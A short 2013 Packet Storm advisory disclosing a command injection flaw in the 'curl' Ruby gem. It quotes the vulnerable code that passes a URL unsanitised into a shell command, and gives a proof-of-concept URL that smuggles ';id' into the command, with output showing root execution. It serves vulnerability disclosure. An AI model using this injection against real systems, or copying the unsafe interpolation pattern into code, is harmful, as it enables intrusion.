Ruby Gem Curl Command Execution

2013-03-13T00:00:00
ID PACKETSTORM:120778
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2013-03-13T00:00:00

Description

                                        
                                            `Curl Ruby Gem Remote command execution  
3/12/2013  
  
https://github.com/tg0/curl  
  
Specially crafted URLs can result in remote code execution:  
  
In ./lib/curl.rb the following lines:  
  
131 cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref} \"{url}\" "  
132 if @debug  
133 puts cmd.red  
134 end  
135 result = open_pipe(cmd)  
  
PoC:  
  
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")  
  
larry@underfl0w:/tmp$ cat p  
uid=0(root) gid=0(root) groups=0(root)  
  
Larry W. Cashdollar  
@_larry0  
http://vapid.dhs.org   
`